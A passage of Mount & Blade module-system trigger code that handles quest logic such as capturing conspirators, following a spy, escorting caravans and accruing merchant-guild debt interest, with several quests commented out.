## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_3"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_3", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_3"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_3"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_4", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_4"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_4", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_4"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_4"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_5", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_5"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_5", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_5"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_5"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_6", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_6"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_6", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_6"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_6"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_7", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_7"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_7", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_7"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_7"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (try_begin),
## (gt, "$qst_defend_nobles_against_peasants_noble_party_8", 0),
## (party_is_active, "$qst_defend_nobles_against_peasants_noble_party_8"),
## (val_add, ":num_active_parties", 1),
## (party_is_in_town, "$qst_defend_nobles_against_peasants_noble_party_8", ":quest_target_center"),
## (remove_party, "$qst_defend_nobles_against_peasants_noble_party_8"),
## (party_get_num_companions, ":num_companions", "$qst_defend_nobles_against_peasants_noble_party_8"),
## (val_add, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":num_companions"),
## (try_end),
## (eq, ":num_active_parties", 0),
## (try_begin),
## (store_div, ":limit", "$qst_defend_nobles_against_peasants_num_nobles_to_save", 2),
## (ge, "$qst_defend_nobles_against_peasants_num_nobles_saved", ":limit"),
## (call_script, "script_succeed_quest", "qst_defend_nobles_against_peasants"),
## (else_try),
## (call_script, "script_fail_quest", "qst_defend_nobles_against_peasants"),
## (try_end),
## ],
## []
## ),
### Capture Conspirators quest
## (0.15, 0.0, 0.0,
## [
## (check_quest_active, "qst_capture_conspirators"),
## (neg|check_quest_succeeded, "qst_capture_conspirators"),
## (neg|check_quest_failed, "qst_capture_conspirators"),
## (quest_get_slot, ":quest_target_center", "qst_capture_conspirators", slot_quest_target_center),
## (quest_get_slot, ":faction_no", "qst_capture_conspirators", slot_quest_target_faction),
## (try_begin),
## (gt, "$qst_capture_conspirators_num_parties_to_spawn", "$qst_capture_conspirators_num_parties_spawned"),
## (store_random_in_range, ":random_no", 0, 100),
## (lt, ":random_no", 20),
## (set_spawn_radius, 3),
## (spawn_around_party,":quest_target_center","pt_conspirator"),
## (val_add, "$qst_capture_conspirators_num_parties_spawned", 1),
## (party_get_num_companions, ":num_companions", reg0),
## (val_add, "$qst_capture_conspirators_num_troops_to_capture", ":num_companions"),
## (party_set_ai_behavior, reg0, ai_bhvr_travel_to_party),
## (party_set_ai_object, reg0, "$qst_capture_conspirators_party_1"),
## (party_set_flags, reg0, pf_default_behavior, 0),
## (try_begin),
## (le, "$qst_capture_conspirators_party_2", 0),
## (assign, "$qst_capture_conspirators_party_2", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_3", 0),
## (assign, "$qst_capture_conspirators_party_3", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_4", 0),
## (assign, "$qst_capture_conspirators_party_4", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_5", 0),
## (assign, "$qst_capture_conspirators_party_5", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_6", 0),
## (assign, "$qst_capture_conspirators_party_6", reg0),
## (else_try),
## (le, "$qst_capture_conspirators_party_7", 0),
## (assign, "$qst_capture_conspirators_party_7", reg0),
## (try_end),
## (try_end),
##
## (assign, ":num_active_parties", 0),
##
## (try_begin),
## (gt, "$qst_capture_conspirators_party_1", 0),
## (party_is_active, "$qst_capture_conspirators_party_1"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_1"),
## (else_try),
## (party_get_num_attached_parties, ":num_attachments", "$qst_capture_conspirators_party_1"),
## (gt, ":num_attachments", 0),
## (assign, ":leave_meeting", 0),
## (try_begin),
## (store_sub, ":required_attachments", "$qst_capture_conspirators_num_parties_to_spawn", 1),
## (eq, ":num_attachments", ":required_attachments"),
## (val_add, "$qst_capture_conspirators_leave_meeting_counter", 1),
## (ge, "$qst_capture_conspirators_leave_meeting_counter", 15),
## (assign, ":leave_meeting", 1),
## (try_end),
## (try_begin),
## (eq, "$qst_capture_conspirators_num_parties_to_spawn", "$qst_capture_conspirators_num_parties_spawned"),
## (store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_capture_conspirators_party_1"),
## (assign, ":min_distance", 3),
## (try_begin),
## (is_currently_night),
## (assign, ":min_distance", 2),
## (try_end),
## (lt, ":cur_distance", ":min_distance"),
## (assign, "$qst_capture_conspirators_leave_meeting_counter", 15),
## (assign, ":leave_meeting", 1),
## (try_end),
## (eq, ":leave_meeting", 1),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_1", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_1", pf_default_behavior, 0),
## (party_get_position, pos1, "$qst_capture_conspirators_party_1"),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_1", pos2),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_2", 0),
## (party_detach, "$qst_capture_conspirators_party_2"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_2", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_2", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_2", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_3", 0),
## (party_detach, "$qst_capture_conspirators_party_3"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_3", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_3", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_3", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_4", 0),
## (party_detach, "$qst_capture_conspirators_party_4"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_4", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_4", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_4", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_5", 0),
## (party_detach, "$qst_capture_conspirators_party_5"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_5", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_5", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_5", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_6", 0),
## (party_detach, "$qst_capture_conspirators_party_6"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_6", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_6", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_6", pos2),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_7", 0),
## (party_detach, "$qst_capture_conspirators_party_7"),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_7", ai_bhvr_travel_to_point),
## (party_set_flags, "$qst_capture_conspirators_party_7", pf_default_behavior, 0),
## (call_script, "script_map_get_random_position_around_position_within_range", 15, 17),
## (party_set_ai_target_position, "$qst_capture_conspirators_party_7", pos2),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_1"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_1"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_1"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_1", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_1", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_1", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_1", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_2", 0),
## (party_is_active, "$qst_capture_conspirators_party_2"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_2"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_2", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_2"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_2"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_2", ai_bhvr_hold),
## (party_attach_to_party, "$qst_capture_conspirators_party_2", "$qst_capture_conspirators_party_1"),
## (party_set_flags, "$qst_capture_conspirators_party_2", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_2"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_2"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_2"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_2", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_2", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_2", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_2", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_3", 0),
## (party_is_active, "$qst_capture_conspirators_party_3"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_3"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_3", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_3"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_3"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_3", ai_bhvr_hold),
## (party_attach_to_party, "$qst_capture_conspirators_party_3", "$qst_capture_conspirators_party_1"),
## (party_set_flags, "$qst_capture_conspirators_party_3", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_3"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_3"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_3"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_3", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_3", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_3", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_3", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_4", 0),
## (party_is_active, "$qst_capture_conspirators_party_4"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_4"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_4", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_4"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_4"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_4", ai_bhvr_hold),
## (party_set_flags, "$qst_capture_conspirators_party_4", pf_default_behavior, 0),
## (party_attach_to_party, "$qst_capture_conspirators_party_4", "$qst_capture_conspirators_party_1"),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_4"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_4"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_4"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_4", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_4", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_4", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_4", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_5", 0),
## (party_is_active, "$qst_capture_conspirators_party_5"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_5"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_5", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_5"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_5"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_5", ai_bhvr_hold),
## (party_set_flags, "$qst_capture_conspirators_party_5", pf_default_behavior, 0),
## (party_attach_to_party, "$qst_capture_conspirators_party_5", "$qst_capture_conspirators_party_1"),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_5"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_5"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_5"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_5", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_5", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_5", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_5", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_6", 0),
## (party_is_active, "$qst_capture_conspirators_party_6"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_6"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_6", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_6"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_6"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_6", ai_bhvr_hold),
## (party_set_flags, "$qst_capture_conspirators_party_6", pf_default_behavior, 0),
## (party_attach_to_party, "$qst_capture_conspirators_party_6", "$qst_capture_conspirators_party_1"),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_6"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_6"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_6"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_6", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_6", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_6", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_6", pf_default_behavior, 0),
## (try_end),
## (try_end),
## (try_begin),
## (gt, "$qst_capture_conspirators_party_7", 0),
## (party_is_active, "$qst_capture_conspirators_party_7"),
## (val_add, ":num_active_parties", 1),
## (try_begin),
## (party_is_in_any_town, "$qst_capture_conspirators_party_7"),
## (try_begin),
## (neg|party_is_in_town, "$qst_capture_conspirators_party_7", "$qst_capture_conspirators_party_1"),
## (remove_party, "$qst_capture_conspirators_party_7"),
## (else_try),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_7"),
## (neq, ":ai_behavior", ai_bhvr_hold),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_7", ai_bhvr_hold),
## (party_set_flags, "$qst_capture_conspirators_party_7", pf_default_behavior, 0),
## (party_attach_to_party, "$qst_capture_conspirators_party_7", "$qst_capture_conspirators_party_1"),
## (try_end),
## (try_end),
## (try_begin),
## (get_party_ai_behavior, ":ai_behavior", "$qst_capture_conspirators_party_7"),
## (eq, ":ai_behavior", ai_bhvr_travel_to_point),
## (party_get_ai_target_position, pos2, "$qst_capture_conspirators_party_7"),
## (party_get_position, pos1, "$qst_capture_conspirators_party_7"),
## (get_distance_between_positions, ":distance", pos2, pos1),
## (lt, ":distance", 200),
## (call_script, "script_get_closest_walled_center_of_faction", "$qst_capture_conspirators_party_7", ":faction_no"),#Can fail
## (ge, reg0, 0),
## (party_set_ai_object, "$qst_capture_conspirators_party_7", reg0),
## (party_set_ai_behavior, "$qst_capture_conspirators_party_7", ai_bhvr_travel_to_party),
## (party_set_flags, "$qst_capture_conspirators_party_7", pf_default_behavior, 0),
## (try_end),
## (try_end),
##
## (eq, ":num_active_parties", 0),
## (party_count_prisoners_of_type, ":count_captured_conspirators", "p_main_party", "trp_conspirator"),
## (party_count_prisoners_of_type, ":count_captured_conspirator_leaders", "p_main_party", "trp_conspirator_leader"),
## (val_add, ":count_captured_conspirators", ":count_captured_conspirator_leaders"),
## (try_begin),
## (store_div, ":limit", "$qst_capture_conspirators_num_troops_to_capture", 2),
## (gt, ":count_captured_conspirators", ":limit"),
## (call_script, "script_succeed_quest", "qst_capture_conspirators"),
## (else_try),
## (call_script, "script_fail_quest", "qst_capture_conspirators"),
## (try_end),
## ],
## []
## ),
# Follow Spy quest
(0.5, 0.0, 0.0,
[
(check_quest_active, "qst_follow_spy"),
(eq, "$qst_follow_spy_no_active_parties", 0),
(quest_get_slot, ":quest_giver_center", "qst_follow_spy", slot_quest_giver_center),
(quest_get_slot, ":quest_object_center", "qst_follow_spy", slot_quest_object_center),
(assign, ":abort_meeting", 0),
(try_begin),
(this_or_next|ge, "$qst_follow_spy_run_away", 2),
(this_or_next|neg|party_is_active, "$qst_follow_spy_spy_party"),
(neg|party_is_active, "$qst_follow_spy_spy_partners_party"),
(else_try),
(eq, "$qst_follow_spy_meeting_state", 0),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_follow_spy_spy_party"),
(try_begin),
(assign, ":min_distance", 3),
(try_begin),
(is_currently_night),
(assign, ":min_distance", 1),
(try_end),
(le, ":cur_distance", ":min_distance"),
(store_distance_to_party_from_party, ":player_distance_to_quest_giver_center", "p_main_party", ":quest_giver_center"),
(gt, ":player_distance_to_quest_giver_center", 1),
(val_add, "$qst_follow_spy_run_away", 1),
(try_begin),
(eq, "$qst_follow_spy_run_away", 2),
(assign, ":abort_meeting", 1),
(display_message, "str_qst_follow_spy_noticed_you"),
(try_end),
(else_try),
(store_distance_to_party_from_party, ":cur_distance", "$qst_follow_spy_spy_partners_party", "$qst_follow_spy_spy_party"),
(le, ":cur_distance", 1),
(party_attach_to_party, "$qst_follow_spy_spy_party", "$qst_follow_spy_spy_partners_party"),
(assign, "$qst_follow_spy_meeting_state", 1),
(assign, "$qst_follow_spy_meeting_counter", 0),
(try_end),
(else_try),
(eq, "$qst_follow_spy_meeting_state", 1),
(store_distance_to_party_from_party, ":cur_distance", "p_main_party", "$qst_follow_spy_spy_partners_party"),
(try_begin),
(le, ":cur_distance", 1),
(party_detach, "$qst_follow_spy_spy_party"),
(val_add, "$qst_follow_spy_run_away", 1),
(try_begin),
(eq, "$qst_follow_spy_run_away", 2),
(assign, ":abort_meeting", 1),
(display_message, "str_qst_follow_spy_noticed_you"),
(try_end),
(else_try),
(val_add, "$qst_follow_spy_meeting_counter", 1),
(gt, "$qst_follow_spy_meeting_counter", 4),
(party_detach, "$qst_follow_spy_spy_party"),
(assign, ":abort_meeting", 1),
(assign, "$qst_follow_spy_meeting_state", 2),
(try_end),
(try_end),
(try_begin),
(eq, ":abort_meeting", 1),
(party_set_ai_object, "$qst_follow_spy_spy_party", ":quest_giver_center"),
(party_set_ai_object, "$qst_follow_spy_spy_partners_party", ":quest_object_center"),
(party_set_ai_behavior, "$qst_follow_spy_spy_party", ai_bhvr_travel_to_party),
(party_set_ai_behavior, "$qst_follow_spy_spy_partners_party", ai_bhvr_travel_to_party),
(party_set_flags, "$qst_follow_spy_spy_party", pf_default_behavior, 0),
(party_set_flags, "$qst_follow_spy_spy_partners_party", pf_default_behavior, 0),
(try_end),
(assign, ":num_active", 0),
(try_begin),
(party_is_active, "$qst_follow_spy_spy_party"),
(val_add, ":num_active", 1),
(party_is_in_town, "$qst_follow_spy_spy_party", ":quest_giver_center"),
(remove_party, "$qst_follow_spy_spy_party"),
(assign, "$qst_follow_spy_spy_back_in_town", 1),
(val_sub, ":num_active", 1),
(try_end),
(try_begin),
(party_is_active, "$qst_follow_spy_spy_partners_party"),
(val_add, ":num_active", 1),
(party_is_in_town, "$qst_follow_spy_spy_partners_party", ":quest_object_center"),
(remove_party, "$qst_follow_spy_spy_partners_party"),
(assign, "$qst_follow_spy_partner_back_in_town", 1),
(val_sub, ":num_active", 1),
(try_end),
(try_begin),
(eq, "$qst_follow_spy_partner_back_in_town",1),
(eq, "$qst_follow_spy_spy_back_in_town",1),
(call_script, "script_fail_quest", "qst_follow_spy"),
(try_end),
(try_begin),
(eq, ":num_active", 0),
(assign, "$qst_follow_spy_no_active_parties", 1),
(party_count_prisoners_of_type, ":num_spies", "p_main_party", "trp_spy"),
(party_count_prisoners_of_type, ":num_spy_partners", "p_main_party", "trp_spy_partner"),
(gt, ":num_spies", 0),
(gt, ":num_spy_partners", 0),
(call_script, "script_succeed_quest", "qst_follow_spy"),
(try_end),
],
[]
),
### Raiders quest
## (0.95, 0.0, 0.2,
## [
## (check_quest_active, "qst_hunt_down_raiders"),
## (neg|check_quest_succeeded, "qst_hunt_down_raiders"),
## (neg|check_quest_failed, "qst_hunt_down_raiders"),
## ],
## [
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (party_set_ai_behavior, ":quest_target_party", ai_bhvr_hold),
## (party_set_flags, ":quest_target_party", pf_default_behavior, 0),
## ]
## ),
##
## (0.7, 0, 0.2,
## [
## (check_quest_active, "qst_hunt_down_raiders"),
## (neg|check_quest_succeeded, "qst_hunt_down_raiders"),
## (neg|check_quest_failed, "qst_hunt_down_raiders"),
## ],
## [
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (party_set_ai_behavior,":quest_target_party",ai_bhvr_travel_to_party),
## (party_set_flags, ":quest_target_party", pf_default_behavior, 0),
## ]
## ),
##
## (0.1, 0.0, 0.0,
## [
## (check_quest_active, "qst_hunt_down_raiders"),
## (neg|check_quest_succeeded, "qst_hunt_down_raiders"),
## (neg|check_quest_failed, "qst_hunt_down_raiders"),
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (neg|party_is_active, ":quest_target_party")
## ],
## [
## (call_script, "script_succeed_quest", "qst_hunt_down_raiders"),
## ]
## ),
##
## (1.3, 0, 0.0,
## [
## (check_quest_active, "qst_hunt_down_raiders"),
## (neg|check_quest_succeeded, "qst_hunt_down_raiders"),
## (neg|check_quest_failed, "qst_hunt_down_raiders"),
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (quest_get_slot, ":quest_target_center", "qst_hunt_down_raiders", slot_quest_target_center),
## (party_is_in_town,":quest_target_party",":quest_target_center")
## ],
## [
## (call_script, "script_fail_quest", "qst_hunt_down_raiders"),
## (display_message, "str_raiders_reached_base"),
## (quest_get_slot, ":quest_target_party", "qst_hunt_down_raiders", slot_quest_target_party),
## (remove_party, ":quest_target_party"),
## ]
## ),
##### TODO: QUESTS COMMENT OUT END
#########################################################################
# Random MERCHANT quest triggers
####################################
# Apply interest to merchants guild debt 1% per week
(24.0 * 7, 0.0, 0.0,
[],
[
(val_mul,"$debt_to_merchants_guild",101),
(val_div,"$debt_to_merchants_guild",100)
]
),
#SB : deprecate these triggers, set party order directly
# Escort merchant caravan:
(1, 0.0, ti_once, [
# (check_quest_active, "qst_escort_merchant_caravan"),
# (eq, "$escort_merchant_caravan_mode", 1)
],
[
# (quest_get_slot, ":quest_target_party", "qst_escort_merchant_caravan", slot_quest_target_party),
# (try_begin),
# (party_is_active, ":quest_target_party"),
# (party_set_ai_behavior, ":quest_target_party", ai_bhvr_hold),
# (party_set_flags, ":quest_target_party", pf_default_behavior, 0),
# (try_end),
]),
(1, 0.0, ti_once, [
# (check_quest_active, "qst_escort_merchant_caravan"),
# (eq, "$escort_merchant_caravan_mode", 0),
],
[
# (quest_get_slot, ":quest_target_party", "qst_escort_merchant_caravan", slot_quest_target_party),
# (try_begin),
# (party_is_active, ":quest_target_party"),
# (party_set_ai_behavior, ":quest_target_party", ai_bhvr_escort_party),
# (party_set_flags, ":quest_target_party", pf_default_behavior, 0),
# (party_set_ai_object, ":quest_target_party", "p_main_party"),
# (try_end),
]),
(0.3, 0, 1.1, [
(check_quest_active, "qst_escort_merchant_caravan"),
(quest_get_slot, ":quest_target_party", "qst_escort_merchant_caravan", slot_quest_target_party),
(neg|party_is_active,":quest_target_party"),
],
[
(call_script, "script_abort_quest", "qst_escort_merchant_caravan", 2),
]),
# Troublesome bandits
(0.3, 0.0, 1.1, [(check_quest_active, "qst_troublesome_bandits"),
(neg|check_quest_failed, "qst_troublesome_bandits"),
(store_num_parties_destroyed, ":cur_eliminated", "pt_troublesome_bandits"),
(lt, "$qst_troublesome_bandits_eliminated", ":cur_eliminated"),
(store_num_parties_destroyed_by_player, ":cur_eliminated_by_player", "pt_troublesome_bandits"),
(eq, ":cur_eliminated_by_player", "$qst_troublesome_bandits_eliminated_by_player"),
],
[(display_message, "str_bandits_eliminated_by_another"),
(call_script, "script_abort_quest", "qst_troublesome_bandits", 0),
]),
(0.3, 0.0, 1.1, [(check_quest_active, "qst_troublesome_bandits"),
(neg|check_quest_succeeded, "qst_troublesome_bandits"),
(store_num_parties_destroyed, ":cur_eliminated", "pt_troublesome_bandits"),
(lt, "$qst_troublesome_bandits_eliminated", ":cur_eliminated"),
(store_num_parties_destroyed_by_player, ":cur_eliminated_by_player", "pt_troublesome_bandits"),
(neq, ":cur_eliminated_by_player", "$qst_troublesome_bandits_eliminated_by_player"),
],
[(call_script, "script_succeed_quest", "qst_troublesome_bandits"),]),
# Kidnapped girl:
(1, 0, 0,
[(check_quest_active, "qst_kidnapped_girl"),
(quest_get_slot, ":quest_target_party", "qst_kidnapped_girl", slot_quest_target_party),
(party_is_active, ":quest_target_party"),
(party_is_in_any_town, ":quest_target_party"),
(remove_party, ":quest_target_party"),
],
[]
),
#Rebellion changes begin
#move
(0, 0, 24 * 14,
[
